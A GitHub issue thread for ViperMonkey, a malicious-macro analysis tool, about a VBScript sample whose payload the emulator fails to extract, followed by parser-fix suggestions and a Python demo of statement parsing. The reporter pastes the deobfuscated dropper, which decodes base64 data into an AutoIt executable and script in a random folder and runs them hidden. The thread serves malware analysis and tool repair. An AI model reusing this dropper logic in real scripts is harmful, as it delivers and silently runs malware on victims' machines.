kirk-sayre-work / ViperMonkey

A VBA parser and emulation engine to analyze malicious macros.

No payload extracted from vbscript #18

Open harold-ogden-walmart opened 4 years ago

harold-ogden-walmart commented 4 years ago

df9941c65fb86b53beca439f821c73b8435a0f85a4b70a9a5e317f3f5385279b
d62b0beb27e3b97923f9263a379492bfdf08a3dbcbb16c0af5a86420f5b74012
3dffb392f186abf80646ef2375f8989dbde3beba249ea374deddb690fa77b9a7

Sample payload:

```vbscript
dim FileObject, MSXml2,basee64,tipo,FolderTarget,AutoitName:Set FileObject = CreateObject("Scripting.FileSystemObject"):if FileObject.GetParentFolderName(WScript.ScriptFullName) = "C:\" then:wscript.quit:end if:FolderTarget = "C:\" + RandomString + "\":FileObject.CreateFolder(FolderTarget):AutoitName = RandomString + ".exe":if FileObject.FolderExists("%ALLUSERSPROFILE%\Panda Security") then:AutoitName = "autoit.exe":end if:AutoitScriptName = RandomString + ".au3":Set MSXml2 = CreateObject("MSXml2.DOMDocument"):Set basee64 = MSXml2.createElement("Base64Data"):Set tipo = CreateObject("ADODB.Stream"):basee64.DataType = "bin.base64":tipo.Type = 1:PAZ = replace(PAZ,"KZMiEq",""):basee64.text = PAZ:tipo.Open():tipo.Write basee64.NodeTypedValue:tipo.SaveToFile FolderTarget+AutoitName, 2:tipo.close:Set objFile = FileObject.CreateTextFile(FolderTarget+"pe.bin",True):objFile.Write rGP:objFile.Close:basee64.text = yWi:tipo.Open():tipo.Write basee64.NodeTypedValue:tipo.SaveToFile FolderTarget+AutoitScriptName, 2:tipo.close:CreateObject("Shell.Application").ShellExecute FolderTarget+AutoitName, AutoitScriptName, FolderTarget, "open", 0:Set objFile = FileObject.CreateTextFile(FileObject.GetSpecialFolder(2) + "\test.txt",True):objFile.Write Wscript.ScriptName:objFile.Close:Function RandomString:Dim tmpdata:Randomize:For i = 1 to 8 :tmpdata = tmpdata & Mid("abcdefghijklmnopqrstuvwxyz0123456789", Int((24)*rnd+1),1):Next:RandomString = tmpdata:End Function; C:\scmbrnqn\mthlucts.exe; C:\scmbrnqn\mthlucts.exe klhcrdkv.au3
```

malvidin commented 3 years ago

For df9941c65fb86b53beca439f821c73b8435a0f85a4b70a9a5e317f3f5385279b, it doesn't return anything even when the -i/--init entry_point is set to qmZlPQ.

malvidin commented 2 years ago

The issue may be in core/statements.py for simple_statement and simple_statement_restricted. Changing the first line for each to the following works on a couple of samples, but I did not check if it breaks anything.

    NotAny(Regex(r"End[ \t]Sub|End[ \t]Function", flags=re.IGNORECASE))

This works as well:

    NotAny(CaselessKeyword("End") + (CaselessKeyword("Sub") | CaselessKeyword("Function")))

If this is used in vba_collapse_long_lines(vba_code):

    return re.sub(r'[ \t]+_[ \t]*(\r\n|\r|\n)[ \t]*', ' ', vba_code)
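As an added example (not ViperMonkey's code and not the commenter's), the following stdlib-only Python sketch shows what the suggested `End Sub`/`End Function` lookahead changes on colon-joined VBScript like the sample above. A statement matcher that accepts anything up to the next `:` also consumes `End Function` as one more statement, so the block never closes and every statement after it is attributed to the function body. The same block applies the line-continuation regex from the comment before splitting. The names `parse_functions`, `split_on_colons`, `is_simple_statement` and the `SAMPLE` text are constructed for illustration and do not mirror ViperMonkey's grammar.

```python
import re

# Constructed sample modelled on the issue's payload: top-level statement,
# a colon-joined Function with a " _" line continuation inside it, then a
# top-level call after End Function. Not the real sample from the issue.
SAMPLE = (
    'Set objFile = FileObject.CreateTextFile("C:\\pe.bin", True):'
    'Function RandomString:Dim tmpdata:Randomize:'
    'tmpdata = tmpdata & Mid("a:b", _\n    1, 1):'
    'RandomString = tmpdata:End Function:'
    'MsgBox RandomString'
)

# Case-insensitive, like the CaselessKeyword / re.IGNORECASE variants in the thread.
FUNC_START = re.compile(r'^(Sub|Function)[ \t]+(\w+)', re.IGNORECASE)
END_BLOCK = re.compile(r'^End[ \t]+(Sub|Function)\b', re.IGNORECASE)


def collapse_long_lines(vba_code):
    """Join ' _' line continuations; same regex as proposed in the thread."""
    return re.sub(r'[ \t]+_[ \t]*(\r\n|\r|\n)[ \t]*', ' ', vba_code)


def split_on_colons(line):
    """Split one physical line on ':' statement separators outside string literals."""
    parts, buf, in_str = [], [], False
    for ch in line:
        if ch == '"':
            in_str = not in_str          # a doubled "" toggles twice, net no change
        if ch == ':' and not in_str:
            parts.append(''.join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    parts.append(''.join(buf).strip())
    return [p for p in parts if p]


def is_simple_statement(stmt, guard_end_block):
    """Stand-in for a simple_statement rule: anything that is not a Sub/Function
    header. With guard_end_block=False it also swallows 'End Function';
    with True the NotAny-style lookahead rejects it so the block can close."""
    if FUNC_START.match(stmt):
        return False
    if guard_end_block and END_BLOCK.match(stmt):
        return False
    return True


def parse_functions(code, guard_end_block=True):
    """Return (blocks, unclosed): blocks maps '<toplevel>' and each function
    name to its statements; unclosed lists functions whose End was never seen."""
    blocks, stack = {'<toplevel>': []}, []
    for line in collapse_long_lines(code).splitlines():
        for stmt in split_on_colons(line):
            header = FUNC_START.match(stmt)
            if header:
                name = header.group(2)
                blocks[name] = []
                stack.append(name)
            elif is_simple_statement(stmt, guard_end_block):
                blocks[stack[-1] if stack else '<toplevel>'].append(stmt)
            elif stack:
                stack.pop()              # End Sub / End Function closes the block
    return blocks, stack


if __name__ == '__main__':
    for guard in (False, True):
        blocks, unclosed = parse_functions(SAMPLE, guard_end_block=guard)
        print('lookahead' if guard else 'no lookahead', '-> unclosed:', unclosed)
        for name, body in blocks.items():
            print('  %-12s %s' % (name, body))
```

Without the lookahead the function body ends up holding `End Function` and the trailing `MsgBox RandomString`, and the function is reported as unclosed, which is the same shape of failure as a parser that never emits the top-level actions; with it, the body stops at `RandomString = tmpdata` and the top-level statement after the function is parsed where it belongs.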